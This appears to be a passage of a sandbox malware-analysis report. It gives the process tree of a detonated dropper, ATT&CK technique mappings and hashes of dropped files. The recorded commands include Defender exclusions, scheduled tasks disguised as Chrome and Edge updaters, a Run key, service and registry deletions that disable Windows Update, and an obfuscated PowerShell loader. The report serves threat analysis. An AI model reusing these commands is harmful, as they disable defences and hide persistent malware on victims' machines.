        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aYLtGzs08v.bat"
        11⤵
        
        PID:5824
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:2252
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        Runs ping.exe
        
        PID:4660
        
        C:\Recovery\WindowsRE\bott.exe
        
        "C:\Recovery\WindowsRE\bott.exe"
        12⤵
        
        PID:1356
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q18N4Nt25o.bat"
        13⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:1552
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:5576
        
        C:\Recovery\WindowsRE\bott.exe
        
        "C:\Recovery\WindowsRE\bott.exe"
        14⤵
        
        PID:5800
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DHvlNttrQi.bat"
        15⤵
        
        PID:4948
- C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- - C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe
    3⤵
    PID:4744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1128
      4⤵
      Program crash
      PID:3816
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1172
      4⤵
      Program crash
      PID:4552
- C:\Users\Admin\AppData\Local\Temp\Files\for.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\for.exe"
  2⤵
  PID:1376
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3172
  - - C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"
      4⤵
      PID:6052
  - - C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
      4⤵
      PID:5252
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
        5⤵
        
        PID:1948
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:5504
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5812
- C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"
  2⤵
  PID:280
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:1984
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4168
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        Creates scheduled task(s)
        
        PID:5420
- - C:\Users\Admin\AppData\Local\Temp\nsa1F6C.tmp
    C:\Users\Admin\AppData\Local\Temp\nsa1F6C.tmp
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:2040
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 2656
      4⤵
      Program crash
      PID:5604
- C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe"
  2⤵
  PID:5544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe'
    3⤵
    PID:5576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Archevod_XWorm.exe'
    3⤵
    PID:4924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    PID:3280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    PID:3328
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5648
- C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
    3⤵
    PID:5648
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Executes dropped EXE
      PID:280
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
      4⤵
      Creates scheduled task(s)
      PID:3332
- - C:\Windows\SysWOW64\WSCript.exe
    WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
    3⤵
    PID:1872
- C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe"
  2⤵
  PID:5884
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:5824
- C:\Users\Admin\AppData\Local\Temp\Files\kehu.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kehu.exe"
  2⤵
  PID:5568
- C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"
  2⤵
  PID:2320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    PID:896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    3⤵
    PID:4060
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5672
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:3056
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:4000
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:2084
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:4340
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5968
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2828
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1944
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:3108
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:5540
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:3724
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:5996
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:1428
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:5876
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:5880
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:4600
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    3⤵
    PID:5100
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
      4⤵
      PID:5924
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:5988
- C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe"
  2⤵
  PID:5816
- C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"
  2⤵
  PID:72
- C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
  2⤵
  PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
    3⤵
    PID:4688
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
      4⤵
      PID:3736
- C:\Users\Admin\AppData\Local\Temp\Files\costa.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\costa.exe"
  2⤵
  PID:5020
- - C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
    "C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\rty27.exe
    "C:\Users\Admin\AppData\Local\Temp\rty27.exe"
    3⤵
    PID:5644
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
    3⤵
    PID:5364
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:1972
- C:\Users\Admin\AppData\Local\Temp\Files\discord.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"
  2⤵
  PID:2832
- C:\Users\Admin\AppData\Local\Temp\Files\native.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:6036
- C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"
  2⤵
  PID:3888
- C:\Users\Admin\AppData\Local\Temp\Files\first.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
  2⤵
  PID:3396

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
1⤵
- Creates scheduled task(s)
PID:5096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4972 -ip 4972
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4704 -ip 4704
1⤵
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6124 -ip 6124
1⤵
PID:4644

C:\Windows\SysWOW64\gparpnjy\ileppyzz.exe
C:\Windows\SysWOW64\gparpnjy\ileppyzz.exe /d"C:\Users\Admin\Documents\GuardFox\AMBZXl8CKqMuSCh42eIpHYa4.exe"
1⤵
PID:5924
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:6104
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 564
  2⤵
  - Program crash
  PID:5920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5924 -ip 5924
1⤵
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2040 -ip 2040
1⤵
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5400 -ip 5400
1⤵
PID:1144

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:1676

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:4456
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  PID:5340

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3344 -ip 3344
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3344 -ip 3344
1⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:4072

C:\Users\Admin\AppData\Roaming\msedge.exe
C:\Users\Admin\AppData\Roaming\msedge.exe
1⤵
PID:2364

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3708 -ip 3708
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3708 -ip 3708
1⤵
PID:1144

C:\Users\Admin\AppData\Roaming\crtbdev
C:\Users\Admin\AppData\Roaming\crtbdev
1⤵
PID:4556

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:6136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3712

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:1436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3268

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a58d9d5a-c6cb-4fe0-8098-dc4811160f26}
1⤵
PID:1432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4744 -ip 4744
1⤵
PID:5892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4744 -ip 4744
1⤵
PID:4796

C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe" -service -lunch
1⤵
PID:2224
- C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"
  2⤵
  PID:4472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft.NET\RedistList\asdfg.exe

Filesize
1.2MB

MD5
d655ce9f1aff58baeaa9184399f52df8

SHA1
964b3fa2951ecffcee8ff93c1b311fdcfafa9595

SHA256
f867d925c6107c52b9e309b327138c553dab2caedffdfefdd7ff05654998cb3d

SHA512
b42c0f9551a3e03e0c412f7db4d3d2f4b93eb9c87a50cceb8c86399b8efacaff6e20fcdd3c204b308a5cd90060c93d429a9c80061c7ef3bdbbde0e3a9273c92f

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\FCFIJEBF

Filesize
92KB

MD5
2ff5581f4a84659e71efa8421eab955c

SHA1
f3b2a1ed74b0c02d2e2ff46b649908cb851817e1

SHA256
d58b3dc5030042531e27a1430963adcd3c9d60a5e46ccf5f673672071e702288

SHA512
fea671fac78bfe432a7abe4963343c9fa30a9063fdc2ebe93f96b422ac111ff400982a030db341b34c1e41c0cb7ca7b87a427bb685ad535975897d74f78c8591

Download Submit
C:\ProgramData\HDGDHCGC

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\ProgramData\RestoreRepair.xlsx

Filesize
600KB

MD5
a9f925ccf1b43385970ae056d47260ea

SHA1
1094005520687f48fcf906cd6a35a368a805d946

SHA256
1370cbff340ed61490c555be8ccffb4ca74f586446077468b1ef45a11233c1b3

SHA512
ef4e4957d29d1ec9a9177584ee616adf9f81038c5573e6b98f70f08c25e77770d9d73e707f2f47bc951bccb612ff9dc69f4cb13abc2da6313350f0fd8305137a

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
159KB

MD5
966e197d5c5da5df0a5398c2e5d1a9fc

SHA1
1e680bf8d8b296e9d1b2065e6fb6b4d598124ad1

SHA256
b8b5c11625f26b9a0b7a932b8824f0f1f0c5adad1e8ddd9b2cda635e77d8243b

SHA512
1c21d94999c73c7bffa3429e7a596b6fd0c56a2821308f331dc35285db320f743fbb413fc49eb83921c660d0daa56ae7592181f148406d24514647eaecefc9e8

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
88KB

MD5
08597052ba56f968dbfb5c324fbd2afc

SHA1
8c86b26c5aeedf4cdb8eacb04c8e295c6b275bed

SHA256
4e30b1dd24afa7d84d759e5630f3a5046850b35e0805f6c91a5f8c90caefb44a

SHA512
37a11dcc711bc282b185ad3a5a74cf185c9b8d43f1556bfc96648e03bfa1c0fd82a2606b70d2d1041cb48b560538fd1cb66addd453604ee677490ce3be617544

Download Submit
C:\ProgramData\UnregisterGrant.docx

Filesize
554KB

MD5
594ee283b812c811bbe049cd27c3f3d4

SHA1
bf061e945dd095567fb464c8368ba3e65b530b69

SHA256
571e3382d495cfc79d43620c997ff5021d54755bd9b5e967bdcd45f40ec2f043

SHA512
1a9de32e018ef6b32e8a85e5deea92f1466efad6f1d7dc4c94cfe14e20d2228f21a19e33241544e29b61e5499a5602fbd45fc095a423cac0598d70f5c7391aea

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.1MB

MD5
8a78157e59dbe3153bc4a49b22c75013

SHA1
0ac3ea2a8001648f7e07bf499ae3e3885da6c0ae

SHA256
a8f68e83eece64f3f0bd55e6e2a967fca72e66648d2c6a59dbbb76ed08f7e7db

SHA512
a64ed84fd1430ca7b8639f2d83a8ce724ecbf3b047ba5d4562a8fa9e0be0756942882def4f4a4109c2a30c81f91c91511eb739361222a7257636169a635b616a

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\CoinSurf.WPF.exe

Filesize
27KB

MD5
4bceb26edc64ec1b81c5d84ac708c822

SHA1
01f77c0342963aed3a58b1b1d7989386b92e3d91

SHA256
ba83a42091f4b914c64bff64a0eff27e966f80703753e4dc930d253bdd592edc

SHA512
5bd2d87945a5fd0e497c64e13b986f4bfa37919251d6aa139a96628ec02b037bb1ee8798f42344d5d01af9e3ffeebd2b3d7bc6436adb6240f3b57f494e6b5917

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe

Filesize
52KB

MD5
e38d4b29956c78dcec70d62c8bbdc095

SHA1
5ca8190b8a979564d0c925dee471d39d7049baea

SHA256
60935e315df2f28d6403f9c9558752a231ea459f3f19916ccf35f35b4d6677e3

SHA512
ee2a5128bf6ebac73f1e80edfecc660dd96c19636fd1352904223e480b18e4bcf1167cc706703376da557dbc90b1c285c2e7cc71a2e332c6a476a569bda43e49

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe

Filesize
34KB

MD5
44a1c1bbdac1b3659e4eae6ba1aad2ec

SHA1
9d007b30511aa46e1735dac16981349aa6f903d9

SHA256
7d02ddbd19db0194c5ac49541757492fc7a16108f5b47fca0558760836b07ee3

SHA512
dbc8becb12f3c3a91f74e7e21cc3ef4b5a42437fddb808e61c991b858f12a3333ac61bf6278afc7527dd2c1dff9b1ff18392580815595a905c8f4706cd1d813e

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe

Filesize
35KB

MD5
4374b40a4cc7dad4505cd22db1e9f401

SHA1
13a63ee209b195a05e6357ce4b3a9be412d67e55

SHA256
389e86e11171286725c0d59719b402ea35185f1bc542e29a1cd459fb2b7b50a9

SHA512
6176e1b3286d0c731121cf83e611169031df899a660697bfe8693d257710bbbb6a571c9d02324f70ee3b69d85614121c75552cbec5cb8b803200f41b1308360a

Download Submit
